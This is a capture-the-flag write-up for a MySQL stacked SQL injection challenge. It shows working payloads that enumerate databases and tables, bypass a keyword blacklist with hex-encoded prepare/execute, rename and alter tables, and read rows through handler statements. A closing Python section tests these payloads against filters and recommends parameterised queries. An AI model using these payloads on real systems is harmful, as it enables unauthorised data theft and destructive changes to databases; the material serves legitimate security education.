This question mainly tests stacked injection, a fairly classic topic; the ichunqiu GYCTF later ran an upgraded version of the same question.
The MySQL statement behind the page is presumably:
select * from words where id='$inject';
Payload construction: a single quote plus a semicolon closes the original statement, the injected SQL statement follows, and a trailing comment character comments out whatever comes after it.
First list all databases:
1';show databases;#
Result:
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
Switch to the database:
1';use supersqli;#
List all tables in the supersqli database:
1';show tables;#
Result:
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
List the columns of table 1919810931114514 (note that a purely numeric table name must be wrapped in backticks, otherwise nothing is echoed):
1';show columns from `1919810931114514`;#
Result:
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
Those are the normal steps, but when trying a select to read the flag, a filter turns out to block select, update, delete, drop, insert and where:
Three ways to get the flag are explained below:
1. Bypass via a prepared statement (prepare):
1';set @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
The hex literal is the MySQL hex encoding of the statement (it decodes to select * from `1919810931114514`), so the filtered keyword never appears in the request. prepare turns the string in @a into a prepared statement, and execute runs it.
For more on this bypass see: Research on SQL injection in PDO scenarios.
2. Bypass via renaming (rename and alter statements):
1';rename table words to word1;rename table `1919810931114514` to words;alter table words add id int unsigned not null auto_increment primary key;alter table words change flag data varchar(100);#
rename table changes the table names: the original words table is moved aside as word1 and the flag table 1919810931114514 takes its name. alter table then changes the table's columns: an id column is added and the flag column is renamed to data.
After this has executed, request 1' or 1=1# again and the flag is returned.
3. handler statement instead of a select query:
This method made its debut in the upgraded version of this question at the ichunqiu GYCTF (which additionally filtered prepare, set and rename, so the first two methods clearly no longer apply).
1';handler `1919810931114514` open as ye;handler ye read first;handler ye close;#
Again, the table name is purely numeric and therefore has to be wrapped in backticks. Note: the handler must be closed, otherwise the flag is not returned.
The handler syntax, for reference:
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
e.g. reading the users table with handler statements:
handler users open as yunensec; # open the table and give the handle an alias
handler yunensec read first; # read the first row through the handle
handler yunensec read next; # read the next row
handler yunensec read next; # read the next row
...
handler yunensec close; # close the handle
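As an added defender's example (not part of the original writeup), the Python below reproduces the challenge's substring blacklist, shows that each of the three payloads above slips past it, and shows what an inspection that decodes hex literals and also looks at statement-level keywords (prepare, set, rename, alter, handler) would flag. The payload strings are the ones from this page; the function names and the digits-only id check are my own assumptions about a fix for the `where id='$inject'` pattern.

```python
import re

# The challenge's keyword blacklist as reported in this writeup (constructed
# from the text; the real filter's implementation is not shown on the page).
CHALLENGE_BLACKLIST = ("select", "update", "delete", "drop", "insert", "where")

# Statement-level keywords the three bypasses above rely on; a defender's
# filter or log rule needs to treat them like the classic DML keywords.
STACKED_QUERY_KEYWORDS = ("prepare", "execute", "set", "rename", "alter", "handler")

# The three payloads from this writeup, written out as single inputs.
PAYLOAD_PREPARE = ("1';set @a=0x73656c656374202a2066726f6d2060313931393831303933"
                   "3131313435313460;prepare execsql from @a;execute execsql;#")
PAYLOAD_RENAME = ("1';rename table words to word1;rename table `1919810931114514` to words;"
                  "alter table words add id int unsigned not null auto_increment primary key;"
                  "alter table words change flag data varchar(100);#")
PAYLOAD_HANDLER = "1';handler `1919810931114514` open as ye;handler ye read first;handler ye close;#"

HEX_LITERAL = re.compile(r"0x(?:[0-9a-fA-F]{2})+")


def decode_hex_literals(s):
    """Expand MySQL 0x... string literals so a keyword check sees the text the
    server will actually run after PREPARE ... FROM @a."""
    return HEX_LITERAL.sub(lambda m: bytes.fromhex(m.group(0)[2:]).decode("latin-1"), s)


def challenge_filter_blocks(payload):
    """Naive substring blacklist, as the challenge applied it."""
    return any(k in payload.lower() for k in CHALLENGE_BLACKLIST)


def stacked_injection_findings(payload):
    """Reasons a stricter inspection would flag this input (empty list = clean)."""
    findings = []
    if ";" in payload:
        findings.append("statement terminator")
    if re.search(r"#|--\s|/\*", payload):
        findings.append("comment marker")
    if HEX_LITERAL.search(payload):
        findings.append("hex literal")
    words = set(re.findall(r"[a-z_]+", decode_hex_literals(payload).lower()))
    findings += sorted("keyword:" + k for k in CHALLENGE_BLACKLIST + STACKED_QUERY_KEYWORDS if k in words)
    return findings


def safe_id(value):
    """The actual fix for `where id='$inject'`: the id column is numeric, so
    accept only digits and pass the integer to a parameterised query."""
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError("id must be a positive integer")
    return int(value)
```

Keyword blacklists only ever catch the keywords someone thought of; the durable mitigation is to validate the id and bind it as a parameter, and to run the query through an API that does not accept multiple statements.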